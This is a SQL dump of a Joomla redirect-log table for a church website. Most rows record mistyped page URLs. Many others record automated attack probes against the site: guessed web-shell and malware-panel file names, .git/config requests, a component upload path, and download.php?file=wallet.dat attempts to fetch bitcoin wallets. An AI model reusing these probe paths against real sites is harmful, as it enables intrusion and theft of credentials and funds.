(8389, 'https://lifeoasisinternationalchurch.org/index.php/contacts', NULL, '', '', 1, 0, '2018-06-05 00:21:09', '0000-00-00 00:00:00', 301),
(8390, 'https://142.4.21.132:443/l.php', NULL, 'https://142.4.21.132:443//l.php', '', 1, 0, '2018-06-07 11:12:22', '0000-00-00 00:00:00', 301),
(8391, 'https://www.lifeoasisinternationalchurch.org/gobc2018', NULL, '', '', 3, 0, '2018-06-07 11:57:46', '0000-00-00 00:00:00', 301),
(8392, 'https://lifeoasisinternationalchurch.org/components/com_facileforms/libraries/jquery/css.php', NULL, 'http://lifeoasisinternationalchurch.org/components/com_facileforms/libraries/jquery/css.php', '', 1, 0, '2018-06-08 04:17:07', '0000-00-00 00:00:00', 301),
(8393, 'https://lifeoasisinternationalchurch.org/50-prayer-a-fasting-day-40', NULL, '', '', 6, 0, '2018-06-08 12:11:50', '0000-00-00 00:00:00', 301),
(8394, 'https://lifeoasisinternationalchurch.org/49-prophetic-words-for-day-39', NULL, '', '', 5, 0, '2018-06-09 00:05:16', '0000-00-00 00:00:00', 301),
(8395, 'https://lifeoasisinternationalchurch.org/thronemusic/', NULL, '', '', 8, 0, '2018-06-09 01:13:48', '0000-00-00 00:00:00', 301),
(8396, 'https://lifeoasisinternationalchurch.org/gobc 2018', NULL, '', '', 3, 0, '2018-06-09 02:43:04', '0000-00-00 00:00:00', 301),
(8397, 'https://www.lifeoasisinternationalchurch.org/gobc/2018', NULL, '', '', 1, 0, '2018-06-10 10:21:28', '0000-00-00 00:00:00', 301),
(8398, 'https://lifeoasisinternationalchurch.org/include.php', NULL, 'http://lifeoasisinternationalchurch.org/include.php', '', 1, 0, '2018-06-11 04:09:28', '0000-00-00 00:00:00', 301),
(8399, 'https://lifeoasisinternationalchurch.org/footer.php', NULL, 'http://lifeoasisinternationalchurch.org/footer.php', '', 1, 0, '2018-06-11 04:09:35', '0000-00-00 00:00:00', 301),
(8400, 'https://lifeoasisinternationalchurch.org/gobc', NULL, '', '', 1, 0, '2018-06-11 17:33:16', '0000-00-00 00:00:00', 301),
(8401, 'https://lifeoasisinternationalchurch.org/-streaming', NULL, '', '', 1, 0, '2018-06-11 21:16:43', '0000-00-00 00:00:00', 301),
(8402, 'https://lifeoasisinternationalchurch.org/pivatestreaming', NULL, '', '', 1, 0, '2018-06-11 22:44:56', '0000-00-00 00:00:00', 301),
(8403, 'https://lifeoasisinternationalchurch.org/prayer/63-day-11', NULL, '', '', 13, 0, '2018-06-12 00:55:46', '0000-00-00 00:00:00', 301),
(8404, 'https://lifeoasisinternationalchurch.org/becoming', NULL, '', '', 1, 0, '2018-06-12 01:38:02', '0000-00-00 00:00:00', 301),
(8405, 'https://lifeoasisinternationalchurch.org/gobc20183&i', NULL, '', '', 1, 0, '2018-06-12 17:04:29', '0000-00-00 00:00:00', 301),
(8406, 'https://lifeoasisinternationalchurch.org/archive/index.php', NULL, 'https://www.google.ru/search?q=%D0%BD%D0%BE%D0%B2%D0%BE%D1%81%D1%82%D0%B8+%D1%87%D0%B5%D0%BB%D1%8F%D0%B1%D0%B8%D0%BD%D1%81%D0%BA+%D0%BC%D0%B8%D1%80+74', '', 115, 0, '2018-06-12 19:15:00', '0000-00-00 00:00:00', 301),
(8407, 'https://lifeoasisinternationalchurch.org/index.php/programme/17-fp-headlines-lists/55-kb-zp', NULL, '', '', 2, 0, '2018-06-13 06:00:41', '0000-00-00 00:00:00', 301),
(8408, 'https://lifeoasisinternationalchurch.org/gib', NULL, '', '', 1, 0, '2018-06-14 10:59:48', '0000-00-00 00:00:00', 301),
(8409, 'https://lifeoasisinternationalchurch.org/gi', NULL, '', '', 1, 0, '2018-06-14 10:59:48', '0000-00-00 00:00:00', 301),
(8410, 'https://lifeoasisinternationalchurch.org/gibc', NULL, '', '', 1, 0, '2018-06-14 10:59:48', '0000-00-00 00:00:00', 301),
(8411, 'https://lifeoasisinternationalchurch.org/gc', NULL, '', '', 1, 0, '2018-06-14 10:59:53', '0000-00-00 00:00:00', 301),
(8412, 'https://www.lifeoasisinternationalchurch.org/streamingww', NULL, '', '', 1, 0, '2018-06-15 21:02:24', '0000-00-00 00:00:00', 301),
(8413, 'https://lifeoasisinternationalchurch.org/category/blog', NULL, '', '', 1, 0, '2018-06-16 02:28:04', '0000-00-00 00:00:00', 301),
(8414, 'https://www.lifeoasisinternationalchurch.org/wall_login.php?login=cmd', NULL, '', '', 1, 0, '2018-06-16 04:27:06', '0000-00-00 00:00:00', 301),
(8415, 'https://www.lifeoasisinternationalchurch.org/resources/blog/item/how to start a business scripturally(1)_files/0', NULL, '', '', 1, 0, '2018-06-16 04:45:09', '0000-00-00 00:00:00', 301),
(8416, 'https://lifeoasisinternationalchurch.org/trainin', NULL, '', '', 15, 0, '2018-06-17 05:17:23', '0000-00-00 00:00:00', 301),
(8417, 'https://lifeoasisinternationalchurch.org/17-prayer-a-fasting-day-8', NULL, '', '', 6, 0, '2018-06-17 18:11:20', '0000-00-00 00:00:00', 301),
(8418, 'https://lifeoasisinternationalchurch.org/programmes', NULL, '', '', 1, 0, '2018-06-18 06:27:58', '0000-00-00 00:00:00', 301),
(8419, 'https://lifeoasisinternationalchurch.org/eladm.php', NULL, '', '', 1, 0, '2018-06-18 08:23:22', '0000-00-00 00:00:00', 301),
(8420, 'https://lifeoasisinternationalchurch.org/qfzlp8x', NULL, 'http://http://goldwea.bali-diving.ru/', '', 1, 0, '2018-06-19 13:11:23', '0000-00-00 00:00:00', 301),
(8421, 'https://lifeoasisinternationalchurch.org/ycv3jrdpx5kim9r84', NULL, 'http://http://goldwea.bali-diving.ru/', '', 1, 0, '2018-06-19 13:11:28', '0000-00-00 00:00:00', 301),
(8422, 'https://lifeoasisinternationalchurch.org/41-prayer-a-fasting-day-32', NULL, '', '', 6, 0, '2018-06-20 03:39:34', '0000-00-00 00:00:00', 301),
(8423, 'https://142.4.21.132/nmaplowercheck1529467762', NULL, '', '', 1, 0, '2018-06-20 04:09:22', '0000-00-00 00:00:00', 301),
(8424, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/5-dark-side-of-the-anointing-3', NULL, '', '', 18, 0, '2018-06-20 05:26:52', '0000-00-00 00:00:00', 301),
(8425, 'https://lifeoasisinternationalchurch.org/\',', NULL, 'https://lifeoasisinternationalchurch.org/about-us/service-times', '', 1, 0, '2018-06-20 06:32:22', '0000-00-00 00:00:00', 301),
(8426, 'https://www.lifeoasisinternationalchurch.org/xmlrpc.php', NULL, '', '', 58, 0, '2018-06-20 06:56:34', '0000-00-00 00:00:00', 301),
(8427, 'https://www.lifeoasisinternationalchurch.org/index.php/login.php', NULL, '', '', 13, 0, '2018-06-20 08:34:26', '0000-00-00 00:00:00', 301),
(8428, 'https://www.lifeoasisinternationalchurch.org/index.php/theme/style.css', NULL, '', '', 2, 0, '2018-06-20 08:34:33', '0000-00-00 00:00:00', 301),
(8429, 'https://www.lifeoasisinternationalchurch.org/index.php/config', NULL, '', '', 1, 0, '2018-06-20 08:34:55', '0000-00-00 00:00:00', 301),
(8430, 'https://www.lifeoasisinternationalchurch.org/index.php/post.php', NULL, '', '', 3, 0, '2018-06-20 08:34:57', '0000-00-00 00:00:00', 301),
(8431, 'https://www.lifeoasisinternationalchurch.org/index.php/index.html', NULL, '', '', 2, 0, '2018-06-20 08:35:00', '0000-00-00 00:00:00', 301),
(8432, 'https://www.lifeoasisinternationalchurch.org/index.php/graphics/banner.png', NULL, '', '', 1, 0, '2018-06-20 08:35:02', '0000-00-00 00:00:00', 301),
(8433, 'https://www.lifeoasisinternationalchurch.org/index.php/project.php', NULL, '', '', 1, 0, '2018-06-20 08:35:07', '0000-00-00 00:00:00', 301),
(8434, 'https://www.lifeoasisinternationalchurch.org/index.php/cron.php', NULL, '', '', 1, 0, '2018-06-20 08:35:23', '0000-00-00 00:00:00', 301),
(8435, 'https://www.lifeoasisinternationalchurch.org/index.php/logout.php', NULL, '', '', 2, 0, '2018-06-20 08:35:24', '0000-00-00 00:00:00', 301),
(8436, 'https://www.lifeoasisinternationalchurch.org/index.php/tasks.php', NULL, '', '', 2, 0, '2018-06-20 08:35:25', '0000-00-00 00:00:00', 301),
(8437, 'https://www.lifeoasisinternationalchurch.org/index.php/stats.php', NULL, '', '', 1, 0, '2018-06-20 08:35:26', '0000-00-00 00:00:00', 301),
(8438, 'https://www.lifeoasisinternationalchurch.org/index.php/run.php', NULL, '', '', 1, 0, '2018-06-20 08:35:27', '0000-00-00 00:00:00', 301),
(8439, 'https://www.lifeoasisinternationalchurch.org/index.php/asdfddsas.php', NULL, '', '', 1, 0, '2018-06-20 08:35:28', '0000-00-00 00:00:00', 301),
(8440, 'https://www.lifeoasisinternationalchurch.org/index.php/theme/header.html', NULL, '', '', 2, 0, '2018-06-20 08:35:31', '0000-00-00 00:00:00', 301),
(8441, 'https://www.lifeoasisinternationalchurch.org/index.php/cp.php', NULL, '', '', 1, 0, '2018-06-20 08:35:32', '0000-00-00 00:00:00', 301),
(8442, 'https://www.lifeoasisinternationalchurch.org/index.php/theme/images/back-all.jpg', NULL, '', '', 1, 0, '2018-06-20 08:35:33', '0000-00-00 00:00:00', 301),
(8443, 'https://www.lifeoasisinternationalchurch.org/index.php/tmp', NULL, '', '', 2, 0, '2018-06-20 08:35:34', '0000-00-00 00:00:00', 301),
(8444, 'https://www.lifeoasisinternationalchurch.org/index.php/tmp/', NULL, '', '', 2, 0, '2018-06-20 08:35:35', '0000-00-00 00:00:00', 301),
(8445, 'https://www.lifeoasisinternationalchurch.org/index.php/vendor', NULL, '', '', 2, 0, '2018-06-20 08:35:36', '0000-00-00 00:00:00', 301),
(8446, 'https://www.lifeoasisinternationalchurch.org/index.php/vendor/', NULL, '', '', 2, 0, '2018-06-20 08:35:37', '0000-00-00 00:00:00', 301),
(8447, 'https://www.lifeoasisinternationalchurch.org/index.php/lib', NULL, '', '', 2, 0, '2018-06-20 08:35:38', '0000-00-00 00:00:00', 301),
(8448, 'https://www.lifeoasisinternationalchurch.org/index.php/lib/', NULL, '', '', 2, 0, '2018-06-20 08:35:39', '0000-00-00 00:00:00', 301),
(8449, 'https://www.lifeoasisinternationalchurch.org/index.php/app', NULL, '', '', 2, 0, '2018-06-20 08:35:40', '0000-00-00 00:00:00', 301),
(8450, 'https://www.lifeoasisinternationalchurch.org/index.php/app/', NULL, '', '', 2, 0, '2018-06-20 08:35:41', '0000-00-00 00:00:00', 301),
(8451, 'https://www.lifeoasisinternationalchurch.org/index.php/tmp/logs', NULL, '', '', 1, 0, '2018-06-20 08:36:46', '0000-00-00 00:00:00', 301),
(8452, 'https://www.lifeoasisinternationalchurch.org/index.php/tmp/logs/', NULL, '', '', 1, 0, '2018-06-20 08:36:46', '0000-00-00 00:00:00', 301),
(8453, 'https://www.lifeoasisinternationalchurch.org/index.php/uploads', NULL, '', '', 1, 0, '2018-06-20 08:36:47', '0000-00-00 00:00:00', 301),
(8454, 'https://www.lifeoasisinternationalchurch.org/index.php/uploads/', NULL, '', '', 1, 0, '2018-06-20 08:36:48', '0000-00-00 00:00:00', 301),
(8455, 'https://www.lifeoasisinternationalchurch.org/index.php/public', NULL, '', '', 1, 0, '2018-06-20 08:36:49', '0000-00-00 00:00:00', 301),
(8456, 'https://www.lifeoasisinternationalchurch.org/index.php/public/', NULL, '', '', 1, 0, '2018-06-20 08:36:50', '0000-00-00 00:00:00', 301),
(8457, 'https://www.lifeoasisinternationalchurch.org/theme/menu.html', NULL, '', '', 2, 0, '2018-06-20 08:36:50', '0000-00-00 00:00:00', 301),
(8458, 'https://www.lifeoasisinternationalchurch.org/index.php/img/logo.png', NULL, '', '', 3, 0, '2018-06-20 08:38:04', '0000-00-00 00:00:00', 301),
(8459, 'https://www.lifeoasisinternationalchurch.org/ca.php?m=4f5441744d6b49744d7a51744d7a55744d7a59744f44553d&h=437', NULL, '', '', 1, 0, '2018-06-20 08:38:07', '0000-00-00 00:00:00', 301),
(8460, 'https://www.lifeoasisinternationalchurch.org/index.php/api.php', NULL, '', '', 1, 0, '2018-06-20 08:38:37', '0000-00-00 00:00:00', 301),
(8461, 'https://www.lifeoasisinternationalchurch.org/index.php/data/login.css', NULL, '', '', 1, 0, '2018-06-20 08:38:38', '0000-00-00 00:00:00', 301),
(8462, 'https://www.lifeoasisinternationalchurch.org/index.php/back.css', NULL, '', '', 1, 0, '2018-06-20 08:38:50', '0000-00-00 00:00:00', 301),
(8463, 'https://www.lifeoasisinternationalchurch.org/index.php/asfdsfafggdf.php', NULL, '', '', 1, 0, '2018-06-20 08:38:59', '0000-00-00 00:00:00', 301),
(8464, 'https://www.lifeoasisinternationalchurch.org/index.php/e.php', NULL, '', '', 1, 0, '2018-06-20 08:39:01', '0000-00-00 00:00:00', 301),
(8465, 'https://www.lifeoasisinternationalchurch.org/index.php/images/', NULL, '', '', 1, 0, '2018-06-20 08:39:02', '0000-00-00 00:00:00', 301),
(8466, 'https://www.lifeoasisinternationalchurch.org/index.php/style.css', NULL, '', '', 1, 0, '2018-06-20 08:39:23', '0000-00-00 00:00:00', 301),
(8467, 'https://www.lifeoasisinternationalchurch.org/index.php/includes/design/images/favicon.ico', NULL, '', '', 1, 0, '2018-06-20 08:39:24', '0000-00-00 00:00:00', 301),
(8468, 'https://www.lifeoasisinternationalchurch.org/index.php/assets/img/favicon.ico', NULL, '', '', 1, 0, '2018-06-20 08:39:27', '0000-00-00 00:00:00', 301),
(8469, 'https://www.lifeoasisinternationalchurch.org/post/echo', NULL, '', '', 1, 0, '2018-06-20 08:40:14', '0000-00-00 00:00:00', 301),
(8470, 'https://www.lifeoasisinternationalchurch.org/index.php/fre.php', NULL, '', '', 1, 0, '2018-06-20 08:40:16', '0000-00-00 00:00:00', 301),
(8471, 'https://www.lifeoasisinternationalchurch.org/path/index.php', NULL, '', '', 1, 0, '2018-06-20 08:40:20', '0000-00-00 00:00:00', 301),
(8472, 'https://www.lifeoasisinternationalchurch.org/index.php/css', NULL, '', '', 5, 0, '2018-06-20 08:40:23', '0000-00-00 00:00:00', 301),
(8473, 'https://www.lifeoasisinternationalchurch.org/index.php/files', NULL, '', '', 6, 0, '2018-06-20 08:40:24', '0000-00-00 00:00:00', 301),
(8474, 'https://www.lifeoasisinternationalchurch.org/index.php/img/back', NULL, '', '', 4, 0, '2018-06-20 08:40:25', '0000-00-00 00:00:00', 301),
(8475, 'https://www.lifeoasisinternationalchurch.org/index.php/img/flags', NULL, '', '', 4, 0, '2018-06-20 08:40:26', '0000-00-00 00:00:00', 301),
(8476, 'https://www.lifeoasisinternationalchurch.org/index.php/img/softs', NULL, '', '', 4, 0, '2018-06-20 08:40:27', '0000-00-00 00:00:00', 301),
(8477, 'https://www.lifeoasisinternationalchurch.org/index.php/home.php', NULL, '', '', 1, 0, '2018-06-20 08:41:18', '0000-00-00 00:00:00', 301),
(8478, 'https://www.lifeoasisinternationalchurch.org/index.php/images/favicon.ico', NULL, '', '', 1, 0, '2018-06-20 08:41:30', '0000-00-00 00:00:00', 301),
(8479, 'https://www.lifeoasisinternationalchurch.org/index.php/ufr.php', NULL, '', '', 1, 0, '2018-06-20 08:41:38', '0000-00-00 00:00:00', 301),
(8480, 'https://www.lifeoasisinternationalchurch.org/panel/login.php', NULL, '', '', 1, 0, '2018-06-20 08:41:43', '0000-00-00 00:00:00', 301),
(8481, 'https://www.lifeoasisinternationalchurch.org/index.php/img', NULL, '', '', 3, 0, '2018-06-20 08:42:08', '0000-00-00 00:00:00', 301),
(8482, 'https://www.lifeoasisinternationalchurch.org/index.php/img/banners', NULL, '', '', 2, 0, '2018-06-20 08:42:09', '0000-00-00 00:00:00', 301),
(8483, 'https://www.lifeoasisinternationalchurch.org/index.php/gate.php', NULL, '', '', 2, 0, '2018-06-20 08:42:16', '0000-00-00 00:00:00', 301),
(8484, 'https://www.lifeoasisinternationalchurch.org/index.php/img/', NULL, '', '', 1, 0, '2018-06-20 08:42:18', '0000-00-00 00:00:00', 301),
(8485, 'https://www.lifeoasisinternationalchurch.org/index.php/includes', NULL, '', '', 1, 0, '2018-06-20 08:42:19', '0000-00-00 00:00:00', 301),
(8486, 'https://www.lifeoasisinternationalchurch.org/index.php/includes/', NULL, '', '', 1, 0, '2018-06-20 08:42:20', '0000-00-00 00:00:00', 301),
(8487, 'https://www.lifeoasisinternationalchurch.org/index.php/statistics.php', NULL, '', '', 1, 0, '2018-06-20 08:42:22', '0000-00-00 00:00:00', 301),
(8488, 'https://www.lifeoasisinternationalchurch.org/index.php/statistics.php/', NULL, '', '', 1, 0, '2018-06-20 08:42:23', '0000-00-00 00:00:00', 301),
(8489, 'https://www.lifeoasisinternationalchurch.org/index.php/gate.php/', NULL, '', '', 1, 0, '2018-06-20 08:42:26', '0000-00-00 00:00:00', 301),
(8490, 'https://www.lifeoasisinternationalchurch.org/index.php/css/', NULL, '', '', 1, 0, '2018-06-20 08:42:28', '0000-00-00 00:00:00', 301),
(8491, 'https://www.lifeoasisinternationalchurch.org/index.php/css/table_view.css', NULL, '', '', 1, 0, '2018-06-20 08:42:29', '0000-00-00 00:00:00', 301),
(8492, 'https://www.lifeoasisinternationalchurch.org/index.php/img/header_logo.png', NULL, '', '', 2, 0, '2018-06-20 08:42:57', '0000-00-00 00:00:00', 301),
(8493, 'https://www.lifeoasisinternationalchurch.org/index.php/21421asdfdsf.php', NULL, '', '', 2, 0, '2018-06-20 08:43:01', '0000-00-00 00:00:00', 301),
(8494, 'https://www.lifeoasisinternationalchurch.org/index.php/webcams.php', NULL, '', '', 1, 0, '2018-06-20 08:43:02', '0000-00-00 00:00:00', 301),
(8495, 'https://www.lifeoasisinternationalchurch.org/index.php/deleteall.php', NULL, '', '', 1, 0, '2018-06-20 08:43:04', '0000-00-00 00:00:00', 301),
(8496, 'https://www.lifeoasisinternationalchurch.org/index.php/delete.php', NULL, '', '', 1, 0, '2018-06-20 08:43:05', '0000-00-00 00:00:00', 301),
(8497, 'https://www.lifeoasisinternationalchurch.org/index.php/passwords.php', NULL, '', '', 1, 0, '2018-06-20 08:43:06', '0000-00-00 00:00:00', 301),
(8498, 'https://www.lifeoasisinternationalchurch.org/index.php/keystrokes.php', NULL, '', '', 1, 0, '2018-06-20 08:43:07', '0000-00-00 00:00:00', 301),
(8499, 'https://www.lifeoasisinternationalchurch.org/index.php/config.php', NULL, '', '', 4, 0, '2018-06-20 08:43:08', '0000-00-00 00:00:00', 301),
(8500, 'https://www.lifeoasisinternationalchurch.org/index.php/create.php', NULL, '', '', 2, 0, '2018-06-20 08:43:10', '0000-00-00 00:00:00', 301),
(8501, 'https://www.lifeoasisinternationalchurch.org/index.php/language.php', NULL, '', '', 1, 0, '2018-06-20 08:43:11', '0000-00-00 00:00:00', 301),
(8502, 'https://www.lifeoasisinternationalchurch.org/index.php/img/agent-dark-logo.png', NULL, '', '', 1, 0, '2018-06-20 08:43:13', '0000-00-00 00:00:00', 301),
(8503, 'https://www.lifeoasisinternationalchurch.org/index.php/img/typo-dark.png', NULL, '', '', 1, 0, '2018-06-20 08:43:14', '0000-00-00 00:00:00', 301),
(8504, 'https://www.lifeoasisinternationalchurch.org/index.php/img/typo.png', NULL, '', '', 1, 0, '2018-06-20 08:43:15', '0000-00-00 00:00:00', 301),
(8505, 'https://www.lifeoasisinternationalchurch.org/index.php/img/user.png', NULL, '', '', 1, 0, '2018-06-20 08:43:16', '0000-00-00 00:00:00', 301),
(8506, 'https://lifeoasisinternationalchurch.org/20-demo/', NULL, '', '', 2, 0, '2018-06-20 14:47:21', '0000-00-00 00:00:00', 301),
(8507, 'https://www.lifeoasisinternationalchurch.org/resourcesradio-streaming', NULL, '', '', 1, 0, '2018-06-20 15:55:50', '0000-00-00 00:00:00', 301),
(8508, 'https://www.lifeoasisinternationalchurch.org/ministries/wimmp/18-loic/50-young-achievers', NULL, '', '', 3, 0, '2018-06-20 15:58:49', '0000-00-00 00:00:00', 301),
(8509, 'https://www.lifeoasisinternationalchurch.org/streaming no', NULL, '', '', 1, 0, '2018-06-20 17:29:52', '0000-00-00 00:00:00', 301),
(8510, 'https://www.lifeoasisinternationalchurch.org/component/content/category/12-sample-content?format=feed&type=atom', NULL, '', '', 7, 0, '2018-06-21 10:01:01', '0000-00-00 00:00:00', 301),
(8511, 'https://www.lifeoasisinternationalchurch.org/11-demo-articles/53-testing', NULL, '', '', 1, 0, '2018-06-21 12:14:23', '0000-00-00 00:00:00', 301),
(8512, 'https://142.4.21.132/cgi/webcgi', NULL, '', '', 1, 0, '2018-06-21 14:31:59', '0000-00-00 00:00:00', 301),
(8513, 'https://lifeoasisinternationalchurch.org/loicforum/archive/index.php/index.php', NULL, 'https://lifeoasisinternationalchurch.org/loicforum/archive/index.php/index.php', '', 1, 0, '2018-06-22 15:09:03', '0000-00-00 00:00:00', 301),
(8514, 'https://lifeoasisinternationalchurch.org/archive/index.php/index.php', NULL, 'https://lifeoasisinternationalchurch.org/archive/index.php/index.php', '', 1, 0, '2018-06-22 15:09:03', '0000-00-00 00:00:00', 301),
(8515, 'https://lifeoasisinternationalchurch.org/default.htm', NULL, '', '', 24, 0, '2018-06-22 22:24:41', '0000-00-00 00:00:00', 301),
(8516, 'https://lifeoasisinternationalchurch.org/prayer/7-kindom-builder/11-prayer-a-fasting-day-2', NULL, '', '', 1, 0, '2018-06-23 22:59:08', '0000-00-00 00:00:00', 301),
(8517, 'https://www.lifeoasisinternationalchurch.org/resources/live-streaming lagos', NULL, '', '', 1, 0, '2018-06-24 09:32:25', '0000-00-00 00:00:00', 301),
(8518, 'https://www.lifeoasisinternationalchurch.org/es', NULL, '', '', 1, 0, '2018-06-24 11:00:15', '0000-00-00 00:00:00', 301),
(8519, 'https://www.lifeoasisinternationalchurch.org/component/content/article/17-fp-headlines-lists/55-kb-zp', NULL, '', '', 1, 0, '2018-06-24 12:48:36', '0000-00-00 00:00:00', 301),
(8520, 'https://lifeoasisinternationalchurch.org/gobc2017/', NULL, '', '', 7, 0, '2018-06-24 14:52:01', '0000-00-00 00:00:00', 301),
(8521, 'https://142.4.21.132/.git/config', NULL, '', '', 6, 0, '2018-06-25 05:38:27', '0000-00-00 00:00:00', 301),
(8522, 'https://lifeoasisinternationalchurch.org//saber.php', NULL, '', '', 1, 0, '2018-06-26 16:29:21', '0000-00-00 00:00:00', 301),
(8523, 'https://lifeoasisinternationalchurch.org//index.php?option=com_adsmanager&task=upload&tmpl=component', NULL, '', '', 2, 0, '2018-06-26 16:29:23', '0000-00-00 00:00:00', 301),
(8524, 'https://lifeoasisinternationalchurch.org/login', NULL, '', '', 6, 0, '2018-06-27 20:25:06', '0000-00-00 00:00:00', 301),
(8525, 'https://www.lifeoasisinternationalchurch.org/12-sample-content/18-sample-content-7', NULL, '', '', 1, 0, '2018-06-28 19:30:32', '0000-00-00 00:00:00', 301),
(8526, 'https://lifeoasisinternationalchurch.org/209teqqij', NULL, 'http://http://swirra.codmaster.ru//', '', 1, 0, '2018-06-28 23:18:02', '0000-00-00 00:00:00', 301),
(8527, 'https://lifeoasisinternationalchurch.org/rrhsz1mpm4x1n', NULL, 'http://http://swirra.codmaster.ru//', '', 1, 0, '2018-06-28 23:18:07', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(8528, 'https://www.lifeoasisinternationalchurch.org/resources/live-youtube', NULL, '', '', 1, 0, '2018-06-30 16:59:51', '0000-00-00 00:00:00', 301),
(8529, 'https://lifeoasisinternationalchurch.org/yo', NULL, '', '', 5, 0, '2018-07-01 16:33:19', '0000-00-00 00:00:00', 301),
(8530, 'https://www.lifeoasisinternationalchurch.org/dcradio', NULL, '', '', 1, 0, '2018-07-01 17:51:28', '0000-00-00 00:00:00', 301),
(8531, 'https://www.lifeoasisinternationalchurch.org/index.php?page=shop.recommend&product_id=1&pop=1&tmpl=component&option=com_virtuemart&itemid=1&vmcchk=1&itemid=1', NULL, '', '', 1, 0, '2018-07-02 06:29:43', '0000-00-00 00:00:00', 301),
(8532, 'https://lifeoasisinternationalchurch.org/libestr', NULL, '', '', 1, 0, '2018-07-02 07:28:31', '0000-00-00 00:00:00', 301),
(8533, 'https://lifeoasisinternationalchurch.org/libvstr', NULL, '', '', 1, 0, '2018-07-02 07:28:33', '0000-00-00 00:00:00', 301),
(8534, 'https://www.lifeoasisinternationalchurch.org/streaming gobc2018', NULL, '', '', 1, 0, '2018-07-02 14:31:32', '0000-00-00 00:00:00', 301),
(8535, 'https://lifeoasisinternationalchurch.org/\'', NULL, '\'%27https://www.google.tm/search?q=site&oq=site&aqs=chrome%27\'69i60l4j69i65.1945j0j7&sourceid=chrome&ie=UTF-8\'%27', '', 1, 0, '2018-07-02 18:08:26', '0000-00-00 00:00:00', 301),
(8536, 'https://www.lifeoasisinternationalchurch.org/streaming/radio', NULL, '', '', 1, 0, '2018-07-03 07:48:11', '0000-00-00 00:00:00', 301),
(8537, 'https://142.4.21.132/stuff.php', NULL, '', '', 1, 0, '2018-07-03 21:41:13', '0000-00-00 00:00:00', 301),
(8538, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/6', NULL, '', '', 1, 0, '2018-07-04 02:31:46', '0000-00-00 00:00:00', 301),
(8539, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/25', NULL, '', '', 1, 0, '2018-07-04 02:32:15', '0000-00-00 00:00:00', 301),
(8540, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/16', NULL, '', '', 12, 0, '2018-07-04 02:33:19', '0000-00-00 00:00:00', 301),
(8541, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/15', NULL, '', '', 1, 0, '2018-07-04 02:34:59', '0000-00-00 00:00:00', 301),
(8542, 'https://www.lifeoasisinternationalchurch.org/partnership.html', NULL, '', '', 11, 0, '2018-07-04 04:28:52', '0000-00-00 00:00:00', 301),
(8543, 'https://lifeoasisinternationalchurch.org/wp-logos.php', NULL, '', '', 2, 0, '2018-07-05 16:31:32', '0000-00-00 00:00:00', 301),
(8544, 'https://www.lifeoasisinternationalchurch.org/livetreaming', NULL, '', '', 1, 0, '2018-07-05 16:49:06', '0000-00-00 00:00:00', 301),
(8545, 'https://lifeoasisinternationalchurch.org/wp-cson.php?canshu=1', NULL, '', '', 2, 0, '2018-07-05 22:31:14', '0000-00-00 00:00:00', 301),
(8546, 'https://lifeoasisinternationalchurch.org/streami', NULL, '', '', 20, 0, '2018-07-06 03:21:07', '0000-00-00 00:00:00', 301),
(8547, 'https://lifeoasisinternationalchurch.org/wp-icoud.php', NULL, '', '', 2, 0, '2018-07-06 05:16:39', '0000-00-00 00:00:00', 301),
(8548, 'https://lifeoasisinternationalchurch.org/sys.php.php', NULL, '', '', 2, 0, '2018-07-06 16:55:48', '0000-00-00 00:00:00', 301),
(8549, 'https://lifeoasisinternationalchurch.org/code.php.php', NULL, '', '', 2, 0, '2018-07-06 22:58:32', '0000-00-00 00:00:00', 301),
(8550, 'https://lifeoasisinternationalchurch.org/configuration', NULL, '', '', 1, 0, '2018-07-08 19:35:12', '0000-00-00 00:00:00', 301),
(8551, 'https://www.lifeoasisinternationalchurch.org/template-info/11-demo-articles', NULL, 'https://www.lifeoasisinternationalchurch.org/template-info/11-demo-articles', '', 4, 0, '2018-07-10 09:42:16', '0000-00-00 00:00:00', 301),
(8552, 'https://lifeoasisinternationalchurch.org/bitcoin/', NULL, '', '', 10, 0, '2018-07-11 19:37:56', '0000-00-00 00:00:00', 301),
(8553, 'https://lifeoasisinternationalchurch.org/download.php?file=wallet.dat', NULL, '', '', 1, 0, '2018-07-11 19:50:33', '0000-00-00 00:00:00', 301),
(8554, 'https://lifeoasisinternationalchurch.org/download.php?file=bitcoin/wallet.dat', NULL, '', '', 1, 0, '2018-07-11 19:57:36', '0000-00-00 00:00:00', 301),
(8555, 'https://lifeoasisinternationalchurch.org/backup/', NULL, '', '', 8, 0, '2018-07-11 20:05:23', '0000-00-00 00:00:00', 301),
(8556, 'https://lifeoasisinternationalchurch.org/alternatestreaming', NULL, '', '', 1, 0, '2018-07-11 21:54:28', '0000-00-00 00:00:00', 301),
(8557, 'https://www.lifeoasisinternationalchurch.org/alternativestreaming', NULL, '', '', 1, 0, '2018-07-11 22:00:51', '0000-00-00 00:00:00', 301),
(8558, 'https://www.lifeoasisinternationalchurch.org/alternatestreaming', NULL, '', '', 1, 0, '2018-07-11 22:02:52', '0000-00-00 00:00:00', 301),
(8559, 'https://www.lifeoasisinternationalchurch.org/altermative', NULL, '', '', 1, 0, '2018-07-11 22:22:06', '0000-00-00 00:00:00', 301),
(8560, 'https://www.lifeoasisinternationalchurch.org/alternate', NULL, '', '', 3, 0, '2018-07-11 22:22:30', '0000-00-00 00:00:00', 301),
(8561, 'https://lifeoasisinternationalchurch.org/resources/alternate-streaming', NULL, '', '', 1, 0, '2018-07-11 22:25:59', '0000-00-00 00:00:00', 301),
(8562, 'https://lifeoasisinternationalchurch.org/alternate streaming', NULL, '', '', 2, 0, '2018-07-11 23:11:36', '0000-00-00 00:00:00', 301),
(8563, 'https://lifeoasisinternationalchurch.org/admin/', NULL, '', '', 2, 0, '2018-07-13 01:45:45', '0000-00-00 00:00:00', 301),
(8564, 'https://142.4.21.132/a2billing/admin/config.php', NULL, '', '', 1, 0, '2018-07-13 11:12:16', '0000-00-00 00:00:00', 301),
(8565, 'https://lifeoasisinternationalchurch.org/pastoral', NULL, '', '', 1, 0, '2018-07-15 05:13:08', '0000-00-00 00:00:00', 301),
